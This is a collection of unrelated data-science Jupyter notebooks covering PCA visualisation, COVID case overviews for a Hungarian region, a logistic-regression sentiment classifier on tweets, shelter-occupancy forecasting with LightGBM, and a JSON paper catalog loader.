fig,ax = plt.subplots(figsize = (10,3*ndl),nrows=ndl)
count=0
for delta_l in dls:
for t in range(nt):
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].isel(time=t),'k-',linewidth=0.2)
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].mean('time'),'k-',linewidth=1)
count+=1
nt = len(residual[0.5]['time'])
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3))
for delta_l in dls:
ax.plot(residual[delta_l][l.name+'_bin'],residual[delta_l].mean('time'),linewidth=1,label=str(delta_l))
ax.legend()
t=70
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3*ndl),nrows=ndl)
count=0
for delta_l in dls:
ax[count].plot(dVdt[delta_l][l.name+'_bin'],dVdt[delta_l].isel(time=t),linewidth=1,label='dVdt')
ax[count].plot(E[delta_l][l.name+'_bin'],E[delta_l].isel(time=t),linewidth=1,label='E')
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].isel(time=t),linewidth=1,label='residual')
ax[count].legend()
count+=1
ndl = len(dls)
fig,ax = plt.subplots(figsize = (10,3*ndl),nrows=ndl)
count=0
for delta_l in dls:
ax[count].plot(dVdt[delta_l][l.name+'_bin'],dVdt[delta_l].mean('time'),linewidth=1,label='dVdt')
ax[count].plot(E[delta_l][l.name+'_bin'],E[delta_l].mean('time'),linewidth=1,label='E')
ax[count].plot(residual[delta_l][l.name+'_bin'],residual[delta_l].mean('time'),linewidth=1,label='residual')
ax[count].legend()
count+=1
###Output
_____no_output_____ |
lab/Lab 10 - Principal Component Analysis.ipynb | ###Markdown
Lab 10 - Principal Component Analysis. The purpose of the following lab is to investigate the behavior of the PCA algorithm on a set of 3 datasets: - Sample of 2500 data-points drawn from a multivariate Gaussian with a diagonal covariance matrix with different variances. - Sample of 1000 data-points sampled on the $\ell_2$ unit circle and then randomly rotated in $\mathbb{R}^3$. - A simple real-world dataset of arrests in the United States.
###Code
import sys
sys.path.append("../")
from utils import *
from scipy.stats import ortho_group
from sklearn.decomposition import PCA
np.random.seed(1)
color_scheme = ["rgb(189,6,96)", "rgb(6,189,99)", "rgb(6,96,189)"]
def plot_principal_component(pca, i):
# Get PC representation as a subspace with size proportional to the corresponding singular value
size = np.sqrt(pca.singular_values_[i])
pc = np.outer(pca.components_[i], np.array([-1,1])) * size
return go.Scatter3d(x=pc[0], y=pc[1], z=pc[2], mode="lines", opacity=.5,
line=dict(color=color_scheme[i], width=2*size), name='PC {}'.format(i+1))
###Output
_____no_output_____
###Markdown
Run one of the code cells below to load the desired dataset and relevant settings.
###Code
# Multivariate Gaussian
cov = [3, 0, 0], [0, 1, 0], [0, 0, 0.1]
X = np.random.multivariate_normal([0, 0, 0], cov, size=2500) @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-4, 4]), yaxis=dict(range=[-4, 4]), zaxis=dict(range=[-4, 4]),
camera=dict(eye=dict(x=1.5, y=1.5, z=.5)))
# Circular data
X = np.random.normal(size=(2, 1000))
X = np.c_[(X/ np.linalg.norm(X, axis=0)).T, np.random.normal(0, .1, 1000)]
X = X @ ortho_group.rvs(3, random_state=1)
scene = proj_scene = dict(xaxis=dict(range=[-1.5, 1.5]), yaxis=dict(range=[-1.5, 1.5]), zaxis=dict(range=[-1.5, 1.5]),
camera=dict(eye=dict(x=-1.5, y=-1.5, z=.1)))
# Real-world data: US Arrests
X = pd.read_csv("../datasets/USArrests.data", index_col=0).drop("UrbanPop", axis=1).to_numpy()
X = (X - X.mean(axis=0))
scene = dict(xaxis=dict(range=[-10,10]), yaxis=dict(range=[-130,170]), zaxis=dict(range=[-20,30]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
proj_scene = dict(xaxis=dict(range=[-130,170]), yaxis=dict(range=[-20,20]), zaxis=dict(range=[-5,10]),
camera=dict(eye=dict(x=2, y=-2, z=.4)))
###Output
_____no_output_____
###Markdown
Projection Using PCA. Let us begin by visualizing the original dataset as well as the PC components determined by the algorithm. In Figure 1, we can see the spread of the dataset in $\mathbb{R}^3$, and that although it is represented in a 3-dimensional space, it is mostly described along some 2-dimensional subspace. Looking at the PCs, and specifically at their size and width, we get an understanding of "how much" of the data is spread in each direction. Rotate Figure 1 to view the data in two ways. First, view the data at an angle perpendicular to both PC1 and PC2. This is the angle at which the data shows the largest amount of spread in a 2-dimensional subspace. See how for both the Gaussian and Circular datasets we are still able to see the main trends of the data. Next, view the data at an angle perpendicular to PC3. In this direction of the 3-dimensional space we are not able to get a clear view of the main trends of the data. We merely observe a dense cloud of points.
###Code
pca = PCA(n_components=3).fit(X)
go.Figure(data = [go.Scatter3d(x = X[:, 0], y=X[:, 1], z=X[:, 2], opacity = .75, mode = 'markers',
marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(pca, i) for i in range(3)],
layout = go.Layout(title=r"$\text{(1) Original Dataset with PC Components}$",
scene = scene, scene_aspectmode="cube"))
###Output
_____no_output_____
###Markdown
Now that we understand how the data is spread across the three computed PCs, let us project it onto them (Figure 2). To do so, let $U\in\mathbb{R}^{d\times k}$ be the matrix with the PCs as columns. As we are currently projecting using all 3 PCs, $U$ is a $3$-by-$3$ orthonormal matrix.
###Code
from copy import deepcopy
tmp = deepcopy(pca)
tmp.components_ = np.array(pca.transform(pca.components_)).T
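# (Added note) The copy's components_ appear to be re-expressed in the projected (PC) coordinate
# system so that plot_principal_component can draw the PC axes inside Figure 2.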
X_projected = pca.transform(X)
go.Figure(data = [go.Scatter3d(x = X_projected[:, 0], y=X_projected[:, 1], z=X_projected[:, 2], opacity = 0.75,
mode = 'markers', marker=dict(size=3, color="black"), showlegend=False)] +
[plot_principal_component(tmp, i) for i in range(3)],
layout = go.Layout(scene=proj_scene, scene_aspectmode="cube",
title=r"$\text{(2) Projection Onto PCA Subspace}$",
scene_xaxis_title="PC1",
scene_yaxis_title="PC2",
scene_zaxis_title="PC3"))
###Output
_____no_output_____
###Markdown
Projection Onto PCA Subspace Of Lower Dimension. So we have seen that the PCA algorithm provides us with an orthonormal basis, with the desired property that each direction corresponds to the amount of spread the data shows in that direction. Recall that since the algorithm provides an orthonormal basis, we can represent each sample $\mathbf{x}_i$ as a linear combination of the columns of $U$: $$ \mathbf{x}_i = \sum^d_{j=1} \langle\mathbf{x}_i,\mathbf{u}_j\rangle \mathbf{u}_j $$ When we project onto a $k<d$ subspace the summation uses only the first $k$ eigenvectors. In matrix notation we compute $\widetilde{\mathbf{X}} = \left(\mathbf{X}U\right)U^\top$ where $U\in\mathbb{R}^{d\times k}$. *For didactic reasons, in the code below we take the transformed (projected) data, zero out the last dimensions and then perform the multiplication by $U^\top$ using the `inverse_transform` function*.
###Code
# Embedding in a 2D subspace
X2d = X_projected.copy()
X2d[:, 2] = 0
X2d = pca.inverse_transform(X2d)
# Embedding in a 1D subspace
X1d = X_projected.copy()
X1d[:, [1,2]] = 0
X1d = pca.inverse_transform(X1d)
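# (Added sketch) Sanity check of the matrix form above: reconstructing with the top-2 PCs directly,
# (X - mean) @ U_k @ U_k^T + mean, should match the zero-and-inverse_transform route used for X2d.
U2 = pca.components_[:2]                          # rows are the first two PCs, i.e. U_k^T of shape (2, d)
X2d_manual = (X - pca.mean_) @ U2.T @ U2 + pca.mean_
assert np.allclose(X2d_manual, X2d)               # expected to hold up to floating-point error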
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{2D Projection}$", r"$\text{1D Projection}$"],
specs=[[{"type":"scatter3d"}, {"type":"scatter3d"}]])
fig.add_traces([go.Scatter3d(x = X2d[:, 0], y=X2d[:, 1], z=X2d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0),
plot_principal_component(pca, 1)], rows=1, cols=1)
fig.add_traces([go.Scatter3d(x = X1d[:, 0], y=X1d[:, 1], z=X1d[:, 2], opacity = 0.75, mode = 'markers', marker=dict(size=3, color="black")),
plot_principal_component(pca, 0)], rows=1, cols=2)
fig.update_layout(title=r"$\text{(3) Projection Onto Lower Dimension Subspace}$", margin = dict(t = 100), showlegend=False,
scene=proj_scene, scene2=proj_scene, scene_aspectmode="cube",
scene_xaxis_title="PC1", scene2_xaxis_title="PC1",
scene_yaxis_title="PC2", scene2_yaxis_title="PC2",
scene_zaxis_title="PC3", scene2_zaxis_title="PC3")
fig.show()
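# Quick sanity check: the squared reconstruction error of the 2D embedding equals the "energy"
# along the dropped third PC, i.e. the squared third singular value.
print(np.sum((X - X2d) ** 2), pca.singular_values_[2] ** 2)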
###Output
_____no_output_____
###Markdown
Explained Variance and Singular ValuesIn the parts above, we have linked the different PCs to how much the data "spreads" in each PC direction. This spread is the variance (as in the variance of random variables) of the data in that direction.We have seen that the subspace found by the PCA algorithm is the subspace of a given dimension $k$ that retains the maximum variance out of all $k$ dimensional subspaces. In the proof itself the link between the variance, the principal components and the singular values becomes evident: if we search for a vector onto which to orthogonally project the data, such that the projected data has maximum variance, then: - This vector, which we name a principal component, is an eigenvector of the sample covariance matrix. - The variance retained by the projection is proportional to the corresponding eigenvalue. - To find the direction with maximum variance we take the first PC to be the eigenvector with the largest eigenvalue.Then, for the next PC we search for a direction in space satisfying the above but which is also perpendicular to the first PC. We continue until we find $k$ PCs.Here, we shall explore this link in an empirical manner, over the loaded datasets. First, let us compute the explained variance, that is, the proportion of variance spread across each PC. As this variance is proportional to the eigenvalues of the sample covariance matrix (which are the squares of the singular values of the centered data matrix), then:
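the proportion of variance explained by the $j$-th PC is $$ \frac{\lambda_j}{\sum_i \lambda_i} = \frac{\sigma_j^2}{\sum_i \sigma_i^2}, $$ where $\sigma_j$ denotes the $j$-th singular value of the centered data matrix and $\lambda_j = \sigma_j^2$ the corresponding eigenvalue of the scatter matrix. This is exactly what `sklearn`'s `explained_variance_ratio_` reports, since the $\tfrac{1}{n-1}$ normalization of the sample covariance cancels in the ratio.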
###Code
from pandas import DataFrame
pca = PCA(n_components=3).fit(X)
ev = pca.singular_values_**2
DataFrame(np.array([ev, ev/sum(ev), pca.explained_variance_ratio_]),
columns=["PC 1", "PC 2", "PC3"],
index=["Eigenvalues", "Explained Variance", "sklearn's Explained Variance"])
variance = list(np.around(100*pca.explained_variance_ratio_, 2)) + [100]
fig = make_subplots(rows=1, cols=2, subplot_titles=[r"$\text{Eigenvalues}$", r"$\text{Cumulative Explained Variance}$"],
specs=[[{'type': 'Bar'}, {'type': 'Waterfall'}]])
fig.add_traces([go.Bar(x=['PC1', 'PC2', 'PC3'], y=ev, marker_color = color_scheme),  # eigenvalues (squared singular values), matching the panel title
go.Waterfall(x=["PC1", "PC2", "PC3", "Total"],
y=variance,
text=[f"{v}%" for v in variance],
textposition = "outside",
totals = {"marker":{"color":"black"}},
measure = ["relative", "relative", "relative", "total"])],
rows=[1,1], cols=[1,2])
fig.add_shape(type="rect", xref="x", yref="y", x0=-0.4, x1=0.4, y0=0.0, y1=fig.data[1].y[0],
fillcolor=color_scheme[0], line=dict(color=color_scheme[0]), opacity=1,row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=0.6, x1=1.4, y0=fig.data[1].y[0], y1=fig.data[1].y[0]+fig.data[1].y[1],
fillcolor=color_scheme[1], line=dict(color=color_scheme[1]), opacity=1, row=1, col=2)
fig.add_shape(type="rect", xref="x", yref="y", x0=1.6, x1=2.4, y0=fig.data[1].y[0]+fig.data[1].y[1], y1=fig.data[1].y[0]+fig.data[1].y[1]+fig.data[1].y[2],
fillcolor=color_scheme[2], line=dict(color=color_scheme[2]), opacity=1, row=1, col=2)
fig.update_layout(showlegend=False, title=r"$\text{(4) PCA Explained Variance}$", margin=dict(t=100))
fig.show()
###Output
_____no_output_____
ipynb/Hungary-Csongrád.ipynb | ###Markdown
Hungary: Csongrád* Homepage of project: https://oscovida.github.io* Plots are explained at http://oscovida.github.io/plots.html* [Execute this Jupyter Notebook using myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Hungary-Csongrád.ipynb)
###Code
import datetime
import time
start = datetime.datetime.now()
print(f"Notebook executed on: {start.strftime('%d/%m/%Y %H:%M:%S%Z')} {time.tzname[time.daylight]}")
%config InlineBackend.figure_formats = ['svg']
from oscovida import *
overview(country="Hungary", region="Csongrád", weeks=5);
overview(country="Hungary", region="Csongrád");
compare_plot(country="Hungary", region="Csongrád");
# load the data
cases, deaths = get_region_hungary(county="Csongrád")
# get population of the region for future normalisation:
inhabitants = population(country="Hungary", region="Csongrád")
print(f'Population of country="Hungary", region="Csongrád": {inhabitants} people')
# compose into one table
table = compose_dataframe_summary(cases, deaths)
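# A simple per-capita normalisation enabled by the population lookup above
# (assumption: `cases` is the cumulative case series returned by get_region_hungary):
cases_per_100k = cases / inhabitants * 100_000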
# show tables with up to 1000 rows
pd.set_option("max_rows", 1000)
# display the table
table
###Output
_____no_output_____
###Markdown
Explore the data in your web browser- If you want to execute this notebook, [click here to use myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Hungary-Csongrád.ipynb)- and wait (~1 to 2 minutes)- Then press SHIFT+RETURN to advance code cell to code cell- See http://jupyter.org for more details on how to use Jupyter Notebook Acknowledgements:- Johns Hopkins University provides data for countries- Robert Koch Institute provides data for within Germany- Atlo Team for gathering and providing data from Hungary (https://atlo.team/koronamonitor/)- Open source and scientific computing community for the data tools- Github for hosting repository and html files- Project Jupyter for the Notebook and binder service- The H2020 project Photon and Neutron Open Science Cloud ([PaNOSC](https://www.panosc.eu/))--------------------
###Code
print(f"Download of data from Johns Hopkins university: cases at {fetch_cases_last_execution()} and "
f"deaths at {fetch_deaths_last_execution()}.")
# to force a fresh download of data, run "clear_cache()"
print(f"Notebook execution took: {datetime.datetime.now()-start}")
###Output
_____no_output_____ |
kata7.ipynb | ###Markdown
In this exercise, you are creating an application that asks a user to enter a list of planets. In a later exercise, you will add code that displays the list. For now, you will create only the code that asks the user for the list of planets.Start by adding two variables: one for the user's input, named new_planet, and another variable for the list of planets, named planets.
###Code
# Create the variable that stores the user's input text
user_planetas = ''
# Create the list that stores each of the values the user enters
planetas = []
# While loop
while user_planetas.lower() != 'done':
    # Check whether user_planetas holds a value
    if user_planetas:
        # Store that value in the list
        planetas.append(user_planetas)
    # Capture a new value
    user_planetas = input('Enter a new value, or done when done')
print(planetas)
###Output
[]
['tierra']
['tierra', 'venus']
['tierra', 'venus', 'saturno']
###Markdown
Exercise: - Loop over a listIn the previous exercise, you created code to ask users to enter a list of planet names. In this exercise, you will complete the application by writing code that displays the names of those planets.
###Code
# Create the variable that stores the user's input text
user_planetas = ''
# Create the list that stores each of the values the user enters
planetas = []
# While loop
while user_planetas.lower() != 'done':
    # Check whether user_planetas holds a value
    if user_planetas:
        # Store that value in the list
        planetas.append(user_planetas)
    # Capture a new value
    user_planetas = input('Enter a new value, or done when done')
for planeta in planetas:
print(planeta)
###Output
mercurio
venus
tierra
###Markdown
Exercise 1: Creating a "while" loopIn Python, while loops let you run code an unknown number of times. Loops examine a Boolean condition and, as long as the condition is true, the code inside the loop is executed. This is very useful for situations such as asking a user for values.In this exercise, you are creating an application that asks a user to enter a list of planets. In a later exercise, you will add code that displays the list. For now, you will create only the code that asks the user for the list of planets.
###Code
from tabulate import tabulate
planeta = []
print("Ingresa nombres de planetas para agregarlos a una lista, ingresa la palabra 'done' para finalizar el programa.")
nuevo_planeta = input("Introduce el nombre de un planeta:")
nplanet = nuevo_planeta.lower()
# Keep asking until the user types 'done'; the sentinel word itself is not stored in the list
while nplanet != 'done':
    planeta.append(nplanet)
    nuevo_planeta = input("Introduce el nombre de un planeta:")
    nplanet = nuevo_planeta.lower()
#print(tabulate(planeta))
###Output
Ingresa nombres de planetas para agregarlos a una lista, ingresa la palabra 'done' para finalizar el programa.
###Markdown
Exercise 2: Creating a "for" loopIn the previous exercise, you created code to ask users to enter a list of planet names. In this exercise, you will complete the application by writing code that displays the names of those planets.Displaying the list of planetsThe planets variable stores the planet names entered by a user. You will now use a loop to display those entries.
###Code
for i in planeta:
    print(i)
###Output
mercurio
venus
tierrs
DOne
|
LAB 7/LogisticRegression-Tweets.ipynb | ###Markdown
Aim:* Extract features for logistic regression given some text* Implement logistic regression from scratch* Apply logistic regression on a natural language processing task* Test logistic regressionWe will be using a data set of tweets. Import functions and data
###Code
import nltk
from nltk.corpus import twitter_samples
import pandas as pd
nltk.download('twitter_samples')
nltk.download('stopwords')
import re
import string
import numpy as np
from nltk.corpus import stopwords
from nltk.stem import PorterStemmer
from nltk.tokenize import TweetTokenizer
#process_tweet(): cleans the text, tokenizes it into separate words, removes stopwords, and converts words to stems.
def process_tweet(tweet):
"""Process tweet function.
Input:
tweet: a string containing a tweet
Output:
tweets_clean: a list of words containing the processed tweet
"""
stemmer = PorterStemmer()
stopwords_english = stopwords.words('english')
# remove stock market tickers like $GE
tweet = re.sub(r'\$\w*', '', tweet)
# remove old style retweet text "RT"
tweet = re.sub(r'^RT[\s]+', '', tweet)
# remove hyperlinks
tweet = re.sub(r'https?:\/\/.*[\r\n]*', '', tweet)
# remove hashtags
# only removing the hash # sign from the word
tweet = re.sub(r'#', '', tweet)
# tokenize tweets
tokenizer = TweetTokenizer(preserve_case=False, strip_handles=True, reduce_len=True)
tweet_tokens = tokenizer.tokenize(tweet)
tweets_clean = []
for word in tweet_tokens:
#############################################################
# 1 remove stopwords
# 2 remove punctuation
# 3 stemming word
# 4 Add it to tweets_clean
if (word not in stopwords_english and word not in string.punctuation):
stem_word = stemmer.stem(word)
tweets_clean.append(stem_word)
return tweets_clean
#build_freqs counts how often a word in the 'corpus' (the entire set of tweets) was associated with
# a positive label '1' or
# a negative label '0',
#then builds the freqs dictionary, where each key is a (word,label) tuple,
#and the value is the count of its frequency within the corpus of tweets.
def build_freqs(tweets, ys):
"""Build frequencies.
Input:
tweets: a list of tweets
ys: an m x 1 array with the sentiment label of each tweet
(either 0 or 1)
Output:
freqs: a dictionary mapping each (word, sentiment) pair to its
frequency
"""
# Convert np array to list since zip needs an iterable.
# The squeeze is necessary or the list ends up with one element.
# Also note that this is just a NOP if ys is already a list.
yslist = np.squeeze(ys).tolist()
# Start with an empty dictionary and populate it by looping over all tweets
# and over all processed words in each tweet.
freqs = {}
for y, tweet in zip(yslist, tweets):
for word in process_tweet(tweet):
pair = (word, y)
#############################################################
#Update the count of pair if present, set it to 1 otherwise
if pair in freqs:
freqs[pair] += 1
else:
freqs[pair] = 1
return freqs
###Output
_____no_output_____
###Markdown
Prepare the data* The `twitter_samples` contains subsets of 5,000 positive tweets, 5,000 negative tweets, and the full set of 10,000 tweets.
###Code
# select the set of positive and negative tweets
all_positive_tweets = twitter_samples.strings('positive_tweets.json')
all_negative_tweets = twitter_samples.strings('negative_tweets.json')
###Output
_____no_output_____
###Markdown
* Train test split: 20% will be in the test set, and 80% in the training set.
###Code
# split the data into two pieces, one for training and one for testing
#############################################################
test_pos = all_positive_tweets[4000:]
train_pos = all_positive_tweets[:4000]
test_neg = all_negative_tweets[4000:]
train_neg = all_negative_tweets[:4000]
train_x = train_pos + train_neg
test_x = test_pos + test_neg
###Output
_____no_output_____
###Markdown
* Create the numpy array of positive labels and negative labels.
###Code
# combine positive and negative labels
train_y = np.append(np.ones((len(train_pos), 1)), np.zeros((len(train_neg), 1)), axis=0)
test_y = np.append(np.ones((len(test_pos), 1)), np.zeros((len(test_neg), 1)), axis=0)
###Output
_____no_output_____
###Markdown
* Create the frequency dictionary using the `build_freqs()` function.
###Code
# create frequency dictionary
#############################################################
freqs = build_freqs(train_x,train_y)
# check the output
print("type(freqs) = " + str(type(freqs)))
print("len(freqs) = " + str(len(freqs.keys())))
###Output
type(freqs) = <class 'dict'>
len(freqs) = 11339
###Markdown
* Here, the `freqs` dictionary is the frequency dictionary that's being built. * The key is the tuple (word, label), such as ("happy", 1) or ("happy", 0). The value stored for each key is the count of how many times the word "happy" was associated with a positive label, or how many times "happy" was associated with a negative label. Process tweet
###Code
# Example
print('This is an example of a positive tweet: \n', train_x[0])
print('\nThis is an example of the processed version of the tweet: \n', process_tweet(train_x[0]))
###Output
This is an example of a positive tweet:
#FollowFriday @France_Inte @PKuchly57 @Milipol_Paris for being top engaged members in my community this week :)
This is an example of the processed version of the tweet:
['followfriday', 'top', 'engag', 'member', 'commun', 'week', ':)']
###Markdown
Logistic regression : Sigmoid$$ h(z) = \frac{1}{1+e^{-z}} $$It maps the input $z$ to a value that ranges between 0 and 1, and so it can be treated as a probability.
###Code
def sigmoid(z):
# calculate the sigmoid of z
#############################################################
h = 1/(1+np.exp(-z))
return h
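# Quick sanity check: sigmoid(0) is exactly 0.5 and large positive inputs saturate towards 1.
print(sigmoid(0), sigmoid(10))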
###Output
_____no_output_____
###Markdown
Logistic regression: regression and a sigmoidLogistic regression takes a regular linear regression and applies a sigmoid to its output.Logistic regression$$ h(z) = \frac{1}{1+e^{-z}}$$$$z = \theta_0 x_0 + \theta_1 x_1 + \theta_2 x_2 + ... + \theta_N x_N$$ Update the weights:Gradient Descent$$\nabla_{\theta_j}J(\theta) = \frac{1}{m} \sum_{i=1}^m(h^{(i)}-y^{(i)})x_j^{(i)} $$* To update the weight $\theta_j$, we adjust it by subtracting a fraction of the gradient determined by $\alpha$:$$\theta_j = \theta_j - \alpha \times \nabla_{\theta_j}J(\theta) $$* The learning rate $\alpha$ is a value that we choose to control how big a single update will be.
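For reference, the cost that this gradient corresponds to (and that the code below computes as `J`) is the mean cross-entropy loss$$ J(\theta) = -\frac{1}{m}\sum_{i=1}^m \left[ y^{(i)}\log h^{(i)} + \left(1-y^{(i)}\right)\log\left(1-h^{(i)}\right)\right], $$where $h^{(i)} = h\!\left(\theta^\top x^{(i)}\right)$.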
###Code
def gradientDescent(x, y, theta, alpha, num_iters):
# get 'm', the number of rows in matrix x
m = len(x)
for i in range(0, num_iters):
# get z, the dot product of x and theta
#############################################################
z = np.dot(x,theta)
# get the sigmoid of z
#############################################################
h = sigmoid(z)
# calculate the cost function
J = (-1/m)*(y.T @ np.log(h) + (1-y).T @ np.log(1-h))
# update the weights theta
#############################################################
theta = theta - (alpha/m) * np.dot(x.transpose(),(h-y))
J = float(J)
return J, theta
###Output
_____no_output_____
###Markdown
Extracting the features* Given a list of tweets, extract the features and store them in a matrix. You will extract two features. * The first feature is the sum, over the words in a tweet, of how often each word appears with a positive label in `freqs`. * The second feature is the analogous sum for the negative label. * Then train your logistic regression classifier on these features.* Test the classifier on a validation set.
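In other words, each tweet $t$ is mapped to the feature vector$$ x(t) = \Big[\,1,\;\; \sum_{w \in t} \text{freqs}(w, 1),\;\; \sum_{w \in t} \text{freqs}(w, 0)\,\Big], $$where the sums run over the processed (stemmed, stopword-free) tokens of the tweet and a missing $(w,\text{label})$ pair counts as $0$.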
###Code
def extract_features(tweet, freqs):
'''
Input:
tweet: a list of words for one tweet
freqs: a dictionary corresponding to the frequencies of each tuple (word, label)
Output:
x: a feature vector of dimension (1,3)
'''
# tokenizes, stems, and removes stopwords
#############################################################
word_l = process_tweet(tweet)
# 3 elements in the form of a 1 x 3 vector
x = np.zeros((1, 3))
#bias term is set to 1
x[0,0] = 1
# loop through each word in the list of words
for word in word_l:
# increment the word count for the positive label 1
#############################################################
x[0,1] += freqs.get((word, 1.0),0)
# increment the word count for the negative label 0
#############################################################
x[0,2] += freqs.get((word, 0.0),0)
assert(x.shape == (1, 3))
return x
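# Illustration with hypothetical freqs entries (for intuition only):
# if freqs contained {("happi", 1.0): 42, ("happi", 0.0): 7}, a tweet whose processed
# tokens include "happi" would add 42 to x[0,1] (positive count) and 7 to x[0,2] (negative count).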
# Check the function
# test 1
# test on training data
tmp1 = extract_features(train_x[0], freqs)
print(tmp1)
# test 2:
# check for when the words are not in the freqs dictionary
tmp2 = extract_features('Hariom pandya', freqs)
print(tmp2)
###Output
[[1. 0. 0.]]
###Markdown
Training Your ModelTo train the model:* Stack the features for all training examples into a matrix `X`. * Call `gradientDescent`
###Code
# collect the features 'x' and stack them into a matrix 'X'
X = np.zeros((len(train_x), 3))
for i in range(len(train_x)):
X[i, :]= extract_features(train_x[i], freqs)
# training labels corresponding to X
Y = train_y
# Apply gradient descent
J, theta = gradientDescent(X, Y, np.zeros((3, 1)), 1e-9, 1500)
print(f"The cost after training is {J:.8f}.")
###Output
The cost after training is 0.24215613.
###Markdown
Test logistic regressionPredict whether a tweet is positive or negative.* Given a tweet, process it, then extract the features.* Apply the model's learned weights on the features to get the logits.* Apply the sigmoid to the logits to get the prediction (a value between 0 and 1).$$y_{pred} = sigmoid(\mathbf{x} \cdot \theta)$$
###Code
def predict_tweet(tweet, freqs, theta):
'''
Input:
tweet: a string
freqs: a dictionary corresponding to the frequencies of each tuple (word, label)
theta: (3,1) vector of weights
Output:
y_pred: the probability of a tweet being positive or negative
'''
# extract the features of the tweet and store it into x
#############################################################
x = extract_features(tweet,freqs)
# make the prediction using x and theta
#############################################################
y_pred = sigmoid(np.dot(x,theta))
return y_pred
# Run this cell to test your function
for tweet in ['I am happy', 'I am bad', 'this movie should have been great.', 'great', 'great great', 'great great great', 'great great great great']:
print( '%s -> %f' % (tweet, predict_tweet(tweet, freqs, theta)))
###Output
I am happy -> 0.518581
I am bad -> 0.494339
this movie should have been great. -> 0.515331
great -> 0.515464
great great -> 0.530899
great great great -> 0.546275
great great great great -> 0.561562
###Markdown
Check performance using the test set
###Code
def test_logistic_regression(test_x, test_y, freqs, theta):
"""
Input:
test_x: a list of tweets
test_y: (m, 1) vector with the corresponding labels for the list of tweets
freqs: a dictionary with the frequency of each pair (or tuple)
theta: weight vector of dimension (3, 1)
Output:
accuracy: (# of tweets classified correctly) / (total # of tweets)
"""
# the list for storing predictions
y_hat = []
for tweet in test_x:
# get the label prediction for the tweet
y_pred = predict_tweet(tweet, freqs, theta)
if y_pred > 0.5:
# append 1.0 to the list
y_hat.append(1)
else:
# append 0 to the list
y_hat.append(0)
# With the above implementation, y_hat is a list, but test_y is (m,1) array
# convert both to one-dimensional arrays in order to compare them using the '==' operator
count=0
y_hat=np.array(y_hat)
m=len(test_y)
#print(m)
test_y=np.reshape(test_y,m)
#print(y_hat.shape)
#print(test_y.shape)
accuracy = ((test_y == y_hat).sum())/m
return accuracy
tmp_accuracy = test_logistic_regression(test_x, test_y, freqs, theta)
print(f"Logistic regression model's accuracy = {tmp_accuracy:.4f}")
###Output
Logistic regression model's accuracy = 0.9950
|
Scripts/Multivariate analysis v3 - Forecast by gender.ipynb | ###Markdown
Loading Libraries
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import statsmodels.api as sm
from statsmodels.tsa.api import VAR
from sklearn.model_selection import train_test_split
import lightgbm as lgb
import seaborn as sns
###Output
_____no_output_____
###Markdown
Data Manipulation
###Code
#reading data
data = pd.read_csv("~/OneDrive/Documents/Datakind/DC DHS/Data/InShelterPerDayGender-10-16-2021.csv")
data['date'] = pd.to_datetime(data['date'])
#data['Total'] = data['Female'] + data['Male'] + data['NA'] + data['Transgender']
data['Total'] = data['Female']
#data = data[data['Total']!=0]
#data[['MinTempF','MaxTempF', 'SnowIn', 'PrecipIn', 'FreezingAtEntry', 'Total']] = data[['MinTempF','MaxTempF', 'SnowIn', 'PrecipIn', 'FreezingAtEntry', 'Total']].fillna(0)
#data = data.dropna()
data.head()
#filtering out data
data = data[~data['year'].isin([2005, 2021])]
###Output
_____no_output_____
###Markdown
Correlation Analysis
###Code
corrmat = data.corr(method = 'spearman')
f,ax = plt.subplots(figsize = (15,10))
sns.heatmap(abs(corrmat), ax = ax , cmap = 'YlGnBu', linewidth = 0.1)
###Output
_____no_output_____
###Markdown
Multivariate Analysis
###Code
# Create a TimeSeries, specifying the time and value columns
model_data = data[['date', 'Total', 'MinTempF', 'PrecipIn','FreezingAtEntry']].reset_index().fillna(0)
X_train, X_test, y_train, y_test = train_test_split(model_data[['date', 'MinTempF', 'PrecipIn','FreezingAtEntry']] ,model_data['Total'], test_size=0.33, shuffle=False)
# fitting model
params = {
'boosting_type': 'gbdt',
'objective': 'regression',
'metric': {'l2', 'l1'},
'learning_rate': 0.05,
'feature_fraction': 0.9,
'bagging_fraction': 0.8,
'bagging_freq': 5,
'verbose': 0,
'max_depth' : 5
}
lgb_train = lgb.Dataset(X_train[['MinTempF', 'PrecipIn','FreezingAtEntry']], y_train)
gbm = lgb.train(params,lgb_train,num_boost_round=500)
forecast = list(gbm.predict(X_train[['MinTempF', 'PrecipIn','FreezingAtEntry']], num_iteration=gbm.best_iteration))
final1 = pd.DataFrame()
final1['date'] = X_train['date']
final1['Total'] = y_train
final1 = final1.reset_index()
final1['Forecast'] = forecast
forecast = list(gbm.predict(X_test[['MinTempF', 'PrecipIn','FreezingAtEntry']], num_iteration=gbm.best_iteration))
final2 = pd.DataFrame()
final2['date'] = X_test['date']
final2['Total'] = y_test
final2 = final2.reset_index()
final2['Forecast'] = forecast
final = final1.append(final2)
final = final.reset_index()
lgb.plot_importance(gbm)
# plotting data
plt.figure(figsize=(15,8))
plt.plot(final.date, final.Total,label='Actual value')
plt.plot(final.date, final.Forecast,label='Forecast Value')
plt.legend()
plt.show()
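# Holdout error metrics on the test portion (illustrative sketch; column names follow the frames built above)
holdout_err = final2['Total'] - final2['Forecast']
holdout_rmse = float(np.sqrt((holdout_err ** 2).mean()))
holdout_mae = float(holdout_err.abs().mean())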
###Output
_____no_output_____ |
notebooks/json-catalog.ipynb | ###Markdown
JSON Catalog
###Code
%load_ext autoreload
%autoreload 2
from cord.jsonpaper import JsonCatalog
from cord.core import BIORXIV_MEDRXIV
catalog = JsonCatalog.load(BIORXIV_MEDRXIV)
catalog
catalog[1000]
paper = catalog.get_paper('0015023cc06b5362d332b3baf348d11567ca2fbb')
paper
catalog['0015023cc06b5362d332b3baf348d11567ca2fbb']
###Output
_____no_output_____ |
